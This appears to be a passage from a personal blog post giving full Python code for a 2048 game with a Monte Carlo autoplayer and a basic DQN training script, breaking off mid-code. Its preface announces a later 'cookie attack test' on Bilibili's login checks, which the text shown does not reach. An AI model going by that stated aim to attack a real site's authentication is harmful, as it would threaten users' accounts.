[100th Original Post] Monte Carlo and Reinforcement Learning Experiments on 2048 + Bilibili Video Crawling and Cookie Attack Tests

Preface

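This is the longest break from posting I have ever taken. Each time I opened the editor to write something, I could not summon the interest, perhaps because this is my hundredth blog post and, out of a somewhat ritualistic compulsion, I kept hoping to write something genuinely interesting.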

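Then a new wave of the epidemic made Yangzhou its epicenter, and I was confined at home for nearly forty days. Staying indoors that long really does make one lazier and less energetic. It affected more than work and study: I had planned to spend the summer training for the 5000 m with a target of 20 minutes, and ended up back at my level of half a year earlier. Even so, the few dozen minutes on the treadmill each day were the only thing that restored my motivation. I made plenty of scattered attempts along the way, but for a long time nothing seemed substantial enough to write up.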

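On my fourth day back at school, I decided to pick out some of the more interesting work from the past month or so and write it up. This post has two parts: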

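  1. The first part covers an automation script for the classic game 2048 and a test of the reinforcement learning algorithm DQN. It started with a video I came across on Bilibili; the uploader's project is at GitHub@2048GameAutoMovePython. The project automates a PyGame implementation of the game using a hand-crafted scoring function and a three-step Monte Carlo simulation, and it works remarkably well: in my tests it reached 2048 more than 80% of the time, and with four or five steps of lookahead the success rate gets close to 100%. The core of the code is the design of the scoring function, which is clever and not something I would easily have come up with.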

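    My own work was to make some improvements on that basis and then test a reinforcement learning implementation on top of it. My main field is natural language processing and I have relatively little experience with reinforcement learning (which, by common opinion, has not worked well in NLP), so I wanted to implement an RL algorithm to deepen my understanding. I had originally planned to write a Sokoban game myself (I find Sokoban genuinely hard), but having an existing game to build on saved the trouble. Amusingly, someone has even written a Sokoban environment for Python, gym-sokoban, which can be installed with pip; the project is at GitHub@gym-sokoban. gym itself is an interesting reinforcement learning package that can also be used for RL on physics-engine robots.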

    I also recently found that someone on GitHub has published a very handy repository of reinforcement learning algorithms implemented in PyTorch, GitHub@Deep-Reinforcement-Learning-Algorithms-with-PyTorch, which is worth studying when time allows.

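  2. The second part covers Bilibili video downloading and a cookie attack test. I had meant to start writing much earlier; the main reason for the delay is that the cookie attack test went poorly. Still, I believe Bilibili's login verification has a serious weakness that could in theory be exploited. The reasoning and the attack script are given below.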

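    For video downloading I give two methods: the first downloads a complete mp4 file directly, and the second downloads the video and audio separately. Neither is very hard, because Bilibili does not encrypt the video source information in its JS at all; the first method needs only packet capture, without even analyzing the page source.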

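    GitHub also hosts a repository for downloading videos from various video sites. I have forgotten the exact address, but as far as I recall its code is not open source and it only provides an installer that must be downloaded and installed before use.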



Part 1: Monte Carlo and Reinforcement Learning Experiments on 2048

(1) The 2048 PyGame Script and the Monte Carlo Method

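The code can be obtained directly from the original author at GitHub@2048GameAutoMovePython. To follow along with the reinforcement learning section below, you can instead use my reorganized version, which is structured as follows: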

../
   manage.py
   config.py
../src/
       ai.py
       game.py
       utils.py
../logging/ # empty folder

The code for the five files above is as follows:

  • manage.py
# -*- coding: UTF-8 -*-
# @author: caoyang
# @email: caoyang@163.sufe.edu.cn

import os
import time
import pygame

from pygame.locals import (QUIT,
                           KEYDOWN,
                           K_ESCAPE,
                           K_LEFT,
                           K_RIGHT,
                           K_DOWN,
                           K_UP,
                           K_w,
                           K_a,
                           K_s,
                           K_d,
                           K_k,
                           K_l,
                           MOUSEBUTTONDOWN)

from config import GameConfig

from src.utils import load_args, save_args, draw_text
from src.game import Game, Button
from src.ai import AI

args = load_args(GameConfig)
save_args(args, f'logging/config_{time.strftime("%Y%m%d%H%M%S")}.json')


# Initialize game
pygame.init()

# Set window
os.environ['SDL_VIDEO_WINDOW_POS'] = '%d,%d' % args.window_pos
raw_screen = pygame.display.set_mode((args.window_width, args.window_height), pygame.DOUBLEBUF, 32)
screen = raw_screen.convert_alpha()
pygame.display.set_caption(args.window_title)

interval = args.interval
state = 'start'
clock = pygame.time.Clock()
game = Game(args.grid_dim)
ai = AI(args)
next_direction = ''
last_time = time.time()
reward = -1

buttons = [
    Button('start', 'Restart', (args.grid_size + 50, 150)),
    Button('ai', 'Autorun', (args.grid_size + 50, 250)),
]


while not state == 'exit':

    if game.state in ['over', 'win']:
        state = game.state

    if state == 'ai' and next_direction == '':
        next_direction, reward = ai.get_next(game.grid.tiles, random_strategy=args.random_strategy)

    # Listen events
    for event in pygame.event.get():
        if event.type == QUIT:
            state = 'exit'
        if event.type == KEYDOWN:
            if event.key == K_ESCAPE:
                state = 'exit'
            elif event.key in [K_LEFT, K_a] and state == 'run':
                next_direction = 'L'
            elif event.key in [K_RIGHT, K_d] and state == 'run':
                next_direction = 'R'
            elif event.key in [K_DOWN, K_s] and state == 'run':
                next_direction = 'D'
            elif event.key in [K_UP, K_w] and state == 'run':
                next_direction = 'U'
            elif event.key in [K_k, K_l] and state == 'ai':
                if event.key == K_k and interval > 0:
                    interval *= 0.9
                if event.key == K_l and interval < 10:
                    if interval == 0:
                        interval = .01
                    else:
                        interval *= 1.1
                if interval < 0:
                    interval = 0

        if event.type == MOUSEBUTTONDOWN:
            for button in buttons:
                if button.is_click(event.pos):
                    state = button.name
                    if button.name == 'ai':
                        button.name = 'run'
                        button.text = 'Manual'
                    elif button.name == 'run':
                        button.name = 'ai'
                        button.text = 'Autorun'
                    break

    # Direction
    if next_direction and (state == 'run' or state == 'ai' and time.time() - last_time > interval):
        game.run(next_direction)
        next_direction = ''
        last_time = time.time()

    # Start game
    elif state == 'start':
        game.start()
        state = 'run'

    # Fill background color
    screen.fill((101, 194, 148))

    # Draw text
    draw_text(screen, f'Score: {game.score}', (args.grid_size + 100, 40), args.fontface)
    if state == 'ai':
        draw_text(screen, f'Interval: {interval}', (args.grid_size + 100, 60), args.fontface)
        draw_text(screen, f'Reward:{round(reward, 3)}', (args.grid_size + 100, 80), args.fontface)

    # Draw button
    for button in buttons:
        if button.is_show:
            pygame.draw.rect(screen, (180, 180, 200), (button.x, button.y, button.w, button.h))
            draw_text(screen, button.text, (button.x + button.w / 2, button.y + 9), args.fontface, size=18, center='center')

    # Draw map
    for y in range(args.grid_dim):
        for x in range(args.grid_dim):
            # Draw block
            number = game.grid.tiles[y][x]
            size = args.grid_size / args.grid_dim
            dx = size * 0.05
            x_size, y_size = x * size, y * size
            color = args.colors[str(int(number))] if number <= args.max_number else (0, 0, 255)
            pygame.draw.rect(screen, color, (x_size + dx, y_size + dx, size - 2 * dx, size - 2 * dx))
            color = (20, 20, 20) if number <= 4 else (255, 255, 255)
            if number:
                length = len(str(number))
                if length == 1:
                    text_size = size * 1.2 / 2
                elif length <= 3:
                    text_size = size * 1.2 / length
                else:
                    text_size = size * 1.5 / length
                draw_text(screen, str(int(number)), (x_size + size * 0.5, y_size + size * 0.5 - text_size / 2), args.fontface, color=color, size=args.fontsize, center='center')

    if state == 'over':
        pygame.draw.rect(screen, (0, 0, 0, 0.5), (0, 0, args.grid_size, args.grid_size))
        draw_text(screen, 'Game over!', (args.grid_size / 2, args.grid_size / 2), args.fontface, size=25, center='center')

    elif state == 'win':
        pygame.draw.rect(screen, (0, 0, 0, 0.5), (0, 0, args.grid_size, args.grid_size))
        draw_text(screen, 'Win!', (args.grid_size / 2, args.grid_size / 2), args.fontface, size=25, center='center')

    # Update
    raw_screen.blit(screen, (0, 0))
    pygame.display.flip()
    clock.tick(args.FPS)

print('Exit game')
  
  • config.py
# -*- coding: UTF-8 -*-
# @author: caoyang
# @email: caoyang@163.sufe.edu.cn

import types
import argparse

class GameConfig:
    parser = argparse.ArgumentParser("--")
    parser.add_argument('--max_number', default=65536, type=int)
    parser.add_argument('--fontface', default='simhei', type=str)
    parser.add_argument('--fontsize', default=56, type=int)
    parser.add_argument('--window_pos', default=(100, 50), type=tuple)
    parser.add_argument('--window_title', default='2048', type=str)
    parser.add_argument('--window_width', default=720, type=int)
    parser.add_argument('--window_height', default=540, type=int)
    parser.add_argument('--FPS', default=60, type=int)
    parser.add_argument('--debug', default=False, type=bool)
    parser.add_argument('--interval', default=.0, type=float)
    parser.add_argument('--animation', default=False, type=bool)
    parser.add_argument('--grid_dim', default=4, type=int)
    parser.add_argument('--grid_size', default=500, type=int)
    parser.add_argument('--colors', default={'0': (205, 193, 180),
                                             '2': (238, 228, 218),
                                             '4': (237, 224, 200),
                                             '8': (242, 177, 121),
                                             '16': (245, 149, 99),
                                             '32': (246, 124, 95),
                                             '64': (246, 94, 59),
                                             '128': (237, 207, 114),
                                             '256': (237, 204, 97),
                                             '512': (237, 200, 80),
                                             '1024': (237, 197, 63),
                                             '2048': (255, 0, 0),
                                             '4096': (255, 0, 0),
                                             '8192': (255, 0, 0),
                                             '16384': (255, 0, 0),
                                             '32768': (255, 0, 0),
                                             '65536': (255, 0, 0)}, type=dict)
    parser.add_argument('--step_ahead', default=3, type=int)
    parser.add_argument('--random_strategy', default=False, type=bool)
    parser.add_argument('--action_mapping', default={'R': 0, 'D': 1, 'L': 2, 'U': 3}, type=dict)

class ModelConfig:
    parser = argparse.ArgumentParser("--")
    parser.add_argument('--max_number', default=65536, type=int)

if __name__ == "__main__":
    config = GameConfig()
    parser = config.parser
    args = parser.parse_args()
    print(args)
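
A side note on the flags above: argparse calls `type` on the raw command-line string, so `type=bool` turns any non-empty string, including 'False', into True. The same caveat applies to `type=tuple` and `type=dict`, which do not parse text such as '(100, 50)' as a literal. The defaults themselves are unaffected, so this only matters when overriding from the command line. A minimal sketch of one workaround follows; `str2bool` is a hypothetical helper that is not part of the original code.

```python
import argparse

def str2bool(text):
    """Hypothetical helper: map common true/false spellings to a bool."""
    value = text.strip().lower()
    if value in ('1', 'true', 'yes', 'y'):
        return True
    if value in ('0', 'false', 'no', 'n'):
        return False
    raise argparse.ArgumentTypeError(f'expected a boolean, got {text!r}')

# As written in config.py: bool('False') is True because the string is non-empty.
naive = argparse.ArgumentParser()
naive.add_argument('--random_strategy', default=False, type=bool)
naive_args = naive.parse_args(['--random_strategy', 'False'])

# With the helper, the flag parses as intended.
fixed = argparse.ArgumentParser()
fixed.add_argument('--random_strategy', default=False, type=str2bool)
fixed_args = fixed.parse_args(['--random_strategy', 'False'])
```

Here `naive_args.random_strategy` ends up True while `fixed_args.random_strategy` is False.
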
  • src/ai.py
# -*- coding: utf-8 -*- 

if __name__ == '__main__':
    import sys

    sys.path.append('../')

import itertools
import numpy as np

from src.game import Grid, Game
from src.utils import load_args
from config import GameConfig

class AI:
    def __init__(self, args):
        self.args = args
        self.grid = Grid(args.grid_dim)
        self.score_map = lambda z: z

    def debug(self, tiles):
        print('\n=======DEBUG========')
        print('Tile before moving:')
        self.print_tiles(tiles)
        score_list = []
        for directions in itertools.product('ULRD', repeat=2):
            _tiles = self.get_grid(tiles, directions)
            scores = self.get_score(_tiles)
            score_list.append([directions, scores])
            print('==={}=={}=='.format(directions, scores))
            self.print_tiles(_tiles)
        score_list = sorted(score_list, key=(lambda x: [x[1]]))
        for score in score_list[::-1]:
            self.grid.tiles = tiles.copy()
            if not self.grid.run(score[0][0], is_fake=True) == 0:
                self.grid.run(score[0][0])
                return score[0][0]
        return score_list[-1][0][0]

    def get_next(self, tiles, random_strategy=False):
        if random_strategy:
            return 'URDL'[np.random.randint(0, 4)], 0
        score_list = []
        tile_num = 0
        for row in tiles:
            for i in row:
                if i == 0:
                    tile_num += 1

        if tile_num >= self.grid.size ** 2 / 3:
            return 'RD'[np.random.randint(0, 2)], 0
        capacity = min(max(tile_num ** 2, 20), 40)
        for directions in itertools.product('ULRD', repeat=self.args.step_ahead):
            scores = []
            for _ in range(capacity):
                _tiles = self.get_grid(tiles, directions)
                scores.append(self.get_score(_tiles))
            # print(directions, min(scores))
            score_list.append([directions, min(scores)])
        score_list = sorted(score_list, key=(lambda x: [x[1]]))
        for score in score_list[::-1]:
            self.grid.tiles = tiles.copy()
            if not self.grid.run(score[0][0], is_fake=False) == 0:
                return score[0][0], score[1] / capacity
        self.grid.tiles = tiles.copy()
        return score_list[-1][0][0], score_list[-1][1] / capacity

    def get_score(self, tiles):
        a = self.get_bj2__4(tiles)
        b = self.get_bj__4(tiles)
        return a * 2.8 + b

    def get_grid(self, tiles, directions):
        g = Grid(self.args.grid_dim)
        g.tiles = tiles.copy()
        for direction in directions:
            g.run(direction)
            g.add_random_tile()
        return g.tiles

    def print_tiles(self, tiles):
        for row in tiles:
            for i in row:
                print("{:^6}".format(i), end='')
            print()

    def get_bj(self, tiles):
        gjs = [
            self.get_bj__1(tiles),
            self.get_bj__2(tiles),
            self.get_bj__3(tiles),
            self.get_bj__4(tiles)
        ]
        return gjs

    def get_bj2(self, tiles):
        gjs = [
            self.get_bj2__1(tiles),
            self.get_bj2__2(tiles),
            self.get_bj2__3(tiles),
            self.get_bj2__4(tiles)
        ]
        return gjs

    def get_bj__1(self, tiles):
        bj = 0
        length = len(tiles)
        size = self.grid.size - 1
        for y in range(length):
            for x in range(length):
                z = tiles[y][x]
                if z:
                    z_log = z - 2
                    bj += z_log * (x + (size - y) - (size * 2 - 1))
                else:
                    bj += (100 - 20 * (x + (size - y) - (size * 2 - 1)))
        return bj

    def get_bj__2(self, tiles):
        bj = 0
        length = len(tiles)
        size = self.grid.size - 1
        for y in range(length):
            for x in range(length):
                z = tiles[y][x]
                if z:
                    z_log = z - 2
                    bj += z_log * ((size - x) + (size - y) - (size * 2 - 1))
                else:
                    bj += (100 - 20 * ((size - x) + (size - y) - (size * 2 - 1)))
        return bj

    def get_bj__3(self, tiles):
        bj = 0
        length = len(tiles)
        size = self.grid.size - 1
        for y in range(length):
            for x in range(length):
                z = tiles[y][x]
                if z:
                    z_log = z - 2
                    bj += z_log * ((size - x) + y - (size * 2 - 1))
                else:
                    bj += (100 - 20 * ((size - x) + y - (size * 2 - 1)))
        return bj

    def get_bj__4(self, tiles):
        bj = 0
        length = len(tiles)
        size = self.grid.size - 1
        for y in range(length):
            for x in range(length):
                z = tiles[y][x]
                if z:
                    z_log = z - 2
                    bj += z_log * (x + y - (size * 2 - 1))
                else:
                    bj += (100 - 20 * (x + y - (size * 2 - 1)))
        return bj

    def get_bj2__1(self, tiles):
        bj = 0
        length = len(tiles)
        for y in range(0, length - 1, 1):
            for x in range(length - 1, 0, -1):
                z = tiles[y][x]
                if tiles[y][x] < tiles[y][x - 1]:
                    bj -= abs(self.score_map(tiles[y][x - 1]) - z)
                if tiles[y][x] < tiles[y + 1][x]:
                    bj -= abs(self.score_map(tiles[y + 1][x]) - z)
                if tiles[y][x] < tiles[y + 1][x - 1]:
                    bj -= abs(self.score_map(tiles[y + 1][x - 1]) - z)
        return bj

    def get_bj2__2(self, tiles):
        bj = 0
        length = len(tiles)
        for y in range(0, length - 1):
            for x in range(0, length - 1):
                z = tiles[y][x]
                if tiles[y][x] < tiles[y][x + 1]:
                    bj -= abs(self.score_map(tiles[y][x + 1]) - z)
                if tiles[y][x] < tiles[y + 1][x]:
                    bj -= abs(self.score_map(tiles[y + 1][x]) - z)
                if tiles[y][x] < tiles[y + 1][x + 1]:
                    bj -= abs(self.score_map(tiles[y + 1][x + 1]) - z)
        return bj

    def get_bj2__3(self, tiles):
        bj = 0
        length = len(tiles)
        for y in range(length - 1, 0, -1):
            for x in range(0, length - 1):
                z = tiles[y][x]
                if tiles[y][x] < tiles[y][x + 1]:
                    bj -= abs(self.score_map(tiles[y][x + 1]) - z)
                if tiles[y][x] < tiles[y - 1][x]:
                    bj -= abs(self.score_map(tiles[y - 1][x]) - z)
                if tiles[y][x] < tiles[y - 1][x + 1]:
                    bj -= abs(self.score_map(tiles[y - 1][x + 1]) - z)
        return bj

    def get_bj2__4(self, tiles):
        bj = 0
        length = len(tiles)
        for y in range(length - 1, 0, -1):
            for x in range(length - 1, 0, -1):
                z = tiles[y][x]
                if z < tiles[y][x - 1]:
                    bj -= abs(self.score_map(tiles[y][x - 1]) - z)
                if z < tiles[y - 1][x]:
                    bj -= abs(self.score_map(tiles[y - 1][x]) - z)
                if z < tiles[y - 1][x - 1]:
                    bj -= abs(self.score_map(tiles[y - 1][x - 1]) - z)
        return bj


if __name__ == '__main__':
    game = Game(4)
    game.grid.tiles = np.array([
        [0, 0, 0, 0],
        [0, 32, 64, 128],
        [256, 512, 1024, 1024],
        [1024, 1024, 1024, 1024]
    ])
    ai = AI(load_args(GameConfig))  # the class is named AI and requires the parsed config
    print(game.grid)

    a = ai.get_next(game.grid.tiles)
    print(a)
    game.run(a[0])
    print(game.grid)
  • src/game.py
# -*- coding: utf-8 -*- 

import random
import pygame
import numpy as np

nmap = {0: 'U', 1: 'R', 2: 'D', 3: 'L'}
fmap = dict([val, key] for key, val in nmap.items())

class Button(pygame.sprite.Sprite):
    def __init__(self, name, text, location, size=(100, 50)):
        pygame.sprite.Sprite.__init__(self)
        self.name = name
        self.text = text
        self.x, self.y = location
        self.w, self.h = size
        self.is_show = True

    def is_click(self, location):
        return self.is_show and self.x <= location[0] <= self.x + self.w and self.y <= location[1] <= self.y + self.h


class Grid(object):
    size = 4
    tiles = []
    max_tile = 0

    def __init__(self, size=4):
        self.size = size
        self.score = 0
        self.tiles = np.zeros((size, size)).astype(np.int32)

    def is_zero(self, x, y):
        return self.tiles[y][x] == 0

    def is_full(self):
        return 0 not in self.tiles

    def set_tiles(self, location, number):
        self.tiles[location[1]][location[0]] = number

    def get_random_location(self):
        if not self.is_full():
            while 1:
                x, y = random.randint(0, self.size - 1), random.randint(0, self.size - 1)
                if self.is_zero(x, y):
                    return x, y
        return -1, -1

    def add_tile_init(self):
        self.add_random_tile()
        self.add_random_tile()

    def add_random_tile(self):
        if not self.is_full():
            value = 2 if random.random() < 0.9 else 4
            self.set_tiles(self.get_random_location(), value)

    def run(self, direction, is_fake=False):
        if isinstance(direction, int):
            direction = nmap[direction]
        self.score = 0
        if is_fake:
            t = self.tiles.copy()
        else:
            t = self.tiles
        if direction == 'U':
            for i in range(self.size):
                self.move_hl(t[:, i])
        elif direction == 'D':
            for i in range(self.size):
                self.move_hl(t[::-1, i])
        elif direction == 'L':
            for i in range(self.size):
                self.move_hl(t[i, :])
        elif direction == 'R':
            for i in range(self.size):
                self.move_hl(t[i, ::-1])
        return self.score

    def move_hl(self, hl):
        len_hl = len(hl)
        for i in range(len_hl - 1):
            if hl[i] == 0:
                for j in range(i + 1, len_hl):
                    if hl[j] != 0:
                        hl[i] = hl[j]
                        hl[j] = 0
                        self.score += 1
                        break
            if hl[i] == 0:
                break
            for j in range(i + 1, len_hl):
                if hl[j] == hl[i]:
                    hl[i] += hl[j]
                    self.score += hl[j]
                    hl[j] = 0
                    break
                if hl[j] != 0:
                    break
        return hl

    def is_over(self):
        if not self.is_full():
            return False
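        # Check every horizontally and vertically adjacent pair, including the last row and column
        for y in range(self.size):
            for x in range(self.size):
                if x + 1 < self.size and self.tiles[y][x] == self.tiles[y][x + 1]:
                    return False
                if y + 1 < self.size and self.tiles[y][x] == self.tiles[y + 1][x]:
                    return False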
        return True

    def is_win(self):
        if self.max_tile > 0:
            return self.max_tile in self.tiles
        else:
            return False

    def to_array(self, normalize=True):
        array = np.log2(self.tiles + np.ones(self.tiles.shape) * (self.tiles == 0)) if normalize else self.tiles.copy()
        return array.flatten().astype(np.int8)

    def __str__(self):
        str_ = '====================\n'
        for row in self.tiles:
            str_ += '-' * (5 * self.size + 1) + '\n'
            for i in row:
                str_ += '|{:4d}'.format(int(i))
            str_ += '|\n'
        str_ += '-' * (5 * self.size + 1) + '\n'
        str_ += '==================\n'
        return str_

class Game:
    score = 0
    env = 'testing'
    state = 'start'
    grid = None

    def __init__(self, grid_size=4, env='production'):
        self.env = env
        self.grid_size = grid_size
        self.start()

    def start(self):
        self.grid = Grid(self.grid_size)
        if self.env == 'production':
            self.grid.add_tile_init()
        self.state = 'run'

    def run(self, direction):
        if self.state in ['over', 'win']:
            return None
        if isinstance(direction, int):
            direction = nmap[direction]

        self.grid.run(direction)
        self.score += self.grid.score

        if self.grid.is_over():
            self.state = 'over'

        if self.grid.is_win():
            self.state = 'win'

        if self.env == 'production':
            self.grid.add_random_tile()
        return self.grid

    def printf(self):
        print(self.grid)
  • src/utils.py
# -*- coding: UTF-8 -*-
# @author: caoyang
# @email: caoyang@163.sufe.edu.cn

if __name__ == '__main__':
    import sys
    sys.path.append('../')

import time
import json
import types  # used by _MyEncoder in save_args
import pygame
import argparse

def load_args(Config):
    config = Config()
    parser = config.parser
    return parser.parse_args()

def save_args(args, save_path=None):

    class _MyEncoder(json.JSONEncoder):
        def default(self, obj):
            if isinstance(obj, type) or isinstance(obj, types.FunctionType):
                return str(obj)
            return json.JSONEncoder.default(self, obj)

    if save_path is None:
        save_path = f'../logging/config_{time.strftime("%Y%m%d%H%M%S")}.json'
    with open(save_path, 'w') as f:
        f.write(json.dumps(vars(args), cls=_MyEncoder))


def screenshot(screen, save_path=None):
    if save_path is None:
        save_path = f'../images/screenshot_{time.strftime("%Y%m%d%H%M%S")}.png'
    # Save in both cases, not only when the default path is used
    pygame.image.save(screen, save_path)


def draw_text(screen, text, location, face, color=(0, 0, 0), size=18, center='center'):
    x, y = location
    font = pygame.font.SysFont(face, size)
    text_render = font.render(text, 1, color)
    text_rect = text_render.get_rect()
    if center == 'center':
        text_rect.move_ip(x - text_rect.w // 2, y)
    else:
        text_rect.move_ip(x, y)
    screen.blit(text_render, text_rect)

if __name__ == '__main__':
    from config import GameConfig
    args = load_args(GameConfig)
    save_args(args)

Run manage.py to start playing 2048. Use the arrow keys (or W/A/S/D) to move the tiles up, down, left, and right, or click Autorun in the window to let the original author's built-in Monte Carlo scoring algorithm play automatically.

Brief notes on the code:

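  • The algorithm lives in ai.py. In get_score() you can change the coefficients of a and b; the essence is still to push large tiles toward a corner. The functions get_bj__1(), get_bj__2(), get_bj__3(), and get_bj__4() score the board with respect to each of the four corners. The default is the bottom-right corner, so Autorun ends up building the 2048 tile in the bottom-right.
  • The Monte Carlo method here simulates the outcome of the next three moves to find the next move with the best score. For each candidate move sequence the code samples several random rollouts and keeps the minimum score, so sequences are ranked by their worst sampled outcome rather than by an average. The default lookahead is three steps; raise the step_ahead parameter in config.py to search deeper.
  • You can also change grid_dim in config.py to change the board size and play on a larger board.
  • Studying how game.py is written and how manage.py drives the game loop is a helpful way to get started with PyGame and build small games.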
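
The two ideas above, a corner-weighted score and ranking move sequences by sampled rollouts, can be sketched in plain Python. This is a simplified illustration under assumptions: `corner_score` reproduces only the arithmetic of get_bj__4() on a list-of-lists board, and `best_first_move` takes a hypothetical `rollout_score` callback standing in for get_grid() plus get_score(). Unlike the original, it does not skip moves that leave the board unchanged.

```python
import itertools

def corner_score(tiles):
    """Position-weighted score that favours large tiles near the bottom-right corner."""
    n = len(tiles)
    offset = 2 * (n - 1) - 1              # same constant as `size * 2 - 1` in src/ai.py
    total = 0
    for y in range(n):
        for x in range(n):
            weight = x + y - offset       # largest (+1) at the bottom-right cell
            z = tiles[y][x]
            if z:
                total += (z - 2) * weight
            else:
                total += 100 - 20 * weight    # an empty cell always earns a bonus
    return total


def best_first_move(rollout_score, depth=3, samples=20, moves="ULRD"):
    """Rank every move sequence by its worst sampled score; return the best first move.

    `rollout_score(sequence)` is a hypothetical callback: it should play `sequence`
    on a copy of the board with random tile spawns and return the resulting score.
    """
    ranked = []
    for sequence in itertools.product(moves, repeat=depth):
        worst = min(rollout_score(sequence) for _ in range(samples))
        ranked.append((worst, sequence))
    worst, sequence = max(ranked)
    return sequence[0], worst
```

For example, a 4x4 board whose only tile is 1024 in the bottom-right corner scores 3182 under `corner_score`, while the same tile in the top-left corner scores -3070, which is why the search keeps steering large tiles toward the bottom-right.
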

(2) Implementing the DQN Reinforcement Learning Algorithm

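Here I implement the fairly basic DQN, following the paper Playing Atari with Deep Reinforcement Learning. The pseudocode of the algorithm is as follows:
[Figure 1: pseudocode of the DQN algorithm]

The algorithm is actually quite straightforward. The $Q$ function can be viewed as a neural network whose inputs are the current state (in 2048, the numbers on the board) and an action (in 2048, one of the four moves up, down, left, and right), and whose output is a score (the $Q$ value). Training samples are collected by playing the game, as follows: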

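  1. First, initialize the starting state (the board at the start of the game).
  2. With high probability choose the action with the highest $Q$ value, and with small probability choose a random action. This is the $\epsilon$-greedy strategy: the perturbation lets more possibilities be explored, whereas always taking the highest-scoring action can get stuck in a local optimum.
  3. The $y_j$ that follows is the theoretical label (ground truth). Its logic comes from the Bellman equation in dynamic programming, and the per-step reward $r_j$ can conveniently be taken from the continually updated score shown in the top-right corner of the 2048 window.
  4. Every simulated step is stored in the memory $\mathcal{D}$, and each training step draws a batch from it.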
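
Steps 2 to 4 can be sketched in a few lines of plain Python. This is a minimal illustration, not the training script: `epsilon_greedy`, `td_target`, and `sample_batch` are hypothetical helper names, and the Q values are passed in as a plain dict instead of coming from a network.

```python
import random

def epsilon_greedy(q_values, epsilon, rng=random):
    """Step 2: pick a random action with probability epsilon, else the argmax.

    q_values maps each action to its current estimate Q(s, a).
    """
    if rng.random() < epsilon:
        return rng.choice(sorted(q_values))
    return max(q_values, key=q_values.get)


def td_target(reward, next_q_values, terminal, gamma=0.99):
    """Step 3: y_j = r_j for a terminal step, else r_j + gamma * max_a' Q(s', a')."""
    if terminal:
        return reward
    return reward + gamma * max(next_q_values.values())


def sample_batch(memory, batch_size, rng=random):
    """Step 4: draw a training batch from the replay memory D."""
    if len(memory) <= batch_size:
        return list(memory)
    return rng.sample(memory, batch_size)
```

With `epsilon=0.0` the choice is purely greedy, and with `epsilon=1.0` it is purely random; practical settings sit in between and are often decayed over training.
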

This gives the following implementation (add train.py and src/model.py to the directory above):

  • train.py
# -*- coding: utf-8 -*- 
# @author : caoyang
# @email: caoyang@163.sufe.edu.cn

import os
import sys
import time
import random

import torch
from torch import optim
from torch.nn import MSELoss
import numpy as np

from src.ai import AI
from src.game import Game
# from src.data import load_dataset_for_PN  # unused here; src/data.py is not in the file listing above
from src.model import TestModel
from src.utils import load_args
from config import GameConfig

from copy import deepcopy

import pickle as pk

def train_DQN(args):
    # Initialization
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')

    n_episodes = 10000
    epsilon = 1e-3 # epsilon greedy rate
    batch_size = 16
    n_samples = 1000

    discount_rate = 0.99

    # Load model
    model = TestModel()
    model = model.to(device)

    optimizer = optim.SGD(model.parameters(), lr=0.01)
    loss = MSELoss()

    # Start game
    replay_memory = []

    index2action = {index: action for action, index in args.action_mapping.items()}
    print(index2action)

    last_score = 0

    action_embedding = {
        'L': [1, 0, 0, 0],
        'R': [0, 1, 0, 0],
        'D': [0, 0, 1, 0],
        'U': [0, 0, 0, 1],
    }

    def q_value(grid, action):
        # Q(s, a): board encoding concatenated with the one-hot action
        x = np.concatenate([grid.to_array(True), action_embedding[action]])
        return model(torch.FloatTensor(x).unsqueeze(0).to(device))

    for episode in range(n_episodes):
        game = Game(args.grid_dim)
        game.start()
        last_score = 0  # the score restarts with every new game
        while True:
            model.eval()
            if random.random() < epsilon: # epsilon greedy: explore
                action = random.choice(list('LRDU'))
            else: # exploit: choose the action with the highest Q value
                with torch.no_grad():
                    action = max(action_embedding, key=lambda a: q_value(game.grid, a).item())
            last_game = deepcopy(game)
            game.run(action) # apply the chosen action exactly once

            reward = game.score - last_score
            transition = (last_game, action, reward, deepcopy(game), game.state)
            replay_memory.append(transition) # Store memory
            last_score = game.score
            if game.state == 'over' or game.state == 'win':
                break

            batch_data = replay_memory[:] if len(replay_memory) < batch_size else random.sample(replay_memory, k=batch_size)
            y_train_batch = []
            x_train_batch = []
            for (prev_game, prev_action, prev_reward, next_game, next_state) in batch_data:
                if next_state in ['win', 'over']:
                    y_train = prev_reward
                else:
                    # Bellman target: r + gamma * max_a' Q(s', a'), computed without gradients
                    with torch.no_grad():
                        max_score = max(q_value(next_game.grid, a).item() for a in action_embedding)
                    y_train = prev_reward + discount_rate * max_score
                # The input is the state before the move plus the action actually taken
                x_train = np.concatenate([prev_game.grid.to_array(True), action_embedding[prev_action]])
                y_train_batch.append(y_train)
                x_train_batch.append(x_train)

            y_train_batch = torch.FloatTensor(y_train_batch).to(device)
            x_train_batch = torch.FloatTensor(np.array(x_train_batch)).to(device)

            # Train
            model.train()
            optimizer.zero_grad()
            y_prob = model(x_train_batch).squeeze(-1) # (batch, 1) -> (batch,) to match the targets
            loss_value = loss(y_prob, y_train_batch)
            loss_value.backward()
            optimizer.step()
            print(episode, loss_value.item())
    torch.save(model, 'model.h5')

if __name__ == '__main__':
    args = load_args(GameConfig)
    train_DQN(args)
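  • src/model.py: for now the file contains only a simple test model. There is not yet good theoretical guidance for designing the model, and this script is only meant to test the reinforcement learning implementation, not to achieve good results. The model input is therefore 20-dimensional by default: the 16 board cells plus a 4-dimensional one-hot encoding of the four moves.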
# -*- coding: utf-8 -*- 
# @author : caoyang
# @email: caoyang@163.sufe.edu.cn

import torch
from torch import nn
from torch.nn import functional as F

class TestModel(nn.Module):

    def __init__(self):
        super(TestModel, self).__init__()
        # self.linear_1 = nn.Linear(in_features=16, out_features=128, bias=True)
        # self.linear_2 = nn.Linear(in_features=128, out_features=4, bias=True)
        # self.softmax = nn.Softmax(dim=-1)
        self.linear_1 = nn.Linear(in_features=20, out_features=128, bias=True)
        self.linear_2 = nn.Linear(in_features=128, out_features=1, bias=True)

    def forward(self, x):
        x = self.linear_1(x)
        # x = self.linear_2(x)
        # output = self.softmax(x)
        output = self.linear_2(x)
        return output
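
To make the 20-dimensional input concrete, here is a small sketch of the encoding in plain Python. It assumes the same conventions as Grid.to_array(True) (log2 of each tile, 0 for an empty cell) and the action_embedding table in train.py; `encode_state_action` is a hypothetical name used only for illustration.

```python
import math

# One-hot codes in the same order as action_embedding in train.py
ACTION_ONE_HOT = {
    'L': [1, 0, 0, 0],
    'R': [0, 1, 0, 0],
    'D': [0, 0, 1, 0],
    'U': [0, 0, 0, 1],
}

def encode_state_action(tiles, action):
    """Flatten a board to log2 values (0 for empty cells) and append the action code."""
    board = [int(math.log2(value)) if value else 0 for row in tiles for value in row]
    return board + ACTION_ONE_HOT[action]

tiles = [
    [0, 2, 4, 8],
    [0, 0, 0, 16],
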